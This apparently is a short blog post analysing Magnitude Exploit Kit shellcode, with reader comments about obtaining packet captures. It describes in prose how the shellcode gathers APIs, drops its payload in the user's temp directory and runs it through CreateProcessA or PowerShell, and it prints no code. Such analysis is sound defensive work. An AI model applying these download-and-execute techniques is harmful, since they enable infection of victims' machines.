Magnitude Exploit Kit is seen to have been downloading shellcode in an independent stream in clear text format. Snapshot from wireshark below,
Post exploitation, the shellcode starts executing. When it starts, it harvests all the required API's. Below is the list of APIs gathered and pushed to stack for later use.
The payload is always downloaded to below location to the local machine (current user's temp directory).
Later it downloads the payload and executes it through "CreateProcessA" API. It is also observed that the shellcode makes use of PowerShell to download and execute the payload.
can u plz share pcap? thx.
ReplyDelete@pwnslinger
you can download from http://malware-traffic-analysis.net
Deleteit has loads of pcaps for magnitude and other kits.